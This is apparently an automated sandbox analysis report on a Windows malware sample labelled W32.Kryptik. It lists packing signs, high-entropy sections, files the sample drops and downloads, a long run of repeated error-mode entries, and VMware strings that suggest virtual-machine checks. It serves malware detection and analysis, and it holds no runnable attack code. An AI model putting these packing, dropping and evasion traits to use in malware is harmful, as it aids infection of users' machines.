Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

Data Obfuscation

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeUnpacked PE file: 0.2.SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.hum:W;.tls:W;.wokeva:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeUnpacked PE file: 0.2.SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe.400000.0.unpack
Source: Y-Cleaner.exe.0.drStatic PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeStatic PE information: section name: .hum
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeStatic PE information: section name: .wokeva
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0042C178 pushad ; retn 0042h0_2_0042C195
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0042B105 push esi; ret 0_2_0042B10E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0042C5CC push esp; retf 0_2_0042C5ED
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0040D67E push ecx; ret 0_2_0040D691
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0042C62A push eax; iretd 0_2_0042C755
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0042C756 push eax; iretd 0_2_0042C755
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_1000E891 push ecx; ret 0_2_1000E8A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0217D8E5 push ecx; ret 0_2_0217D8F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0218CF6F push esp; retf 0_2_0218CF77
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0218D4C9 pushad ; ret 0_2_0218D4CA
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0218D50C push eax; ret 0_2_0218D50D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0218D56D push esp; retf 0_2_0218D56E
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeStatic PE information: section name: .text entropy: 7.8387433799683475
Source: Y-Cleaner.exe.0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeFile created: C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeFile created: C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Y-Cleaner.exeJump to dropped file
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Bunifu_UI_v1.5.3.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1]
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Y-Cleaner.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe API coverage: 9.6 %
Source: Amcache.hve.3.dr Binary or memory string: VMware
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
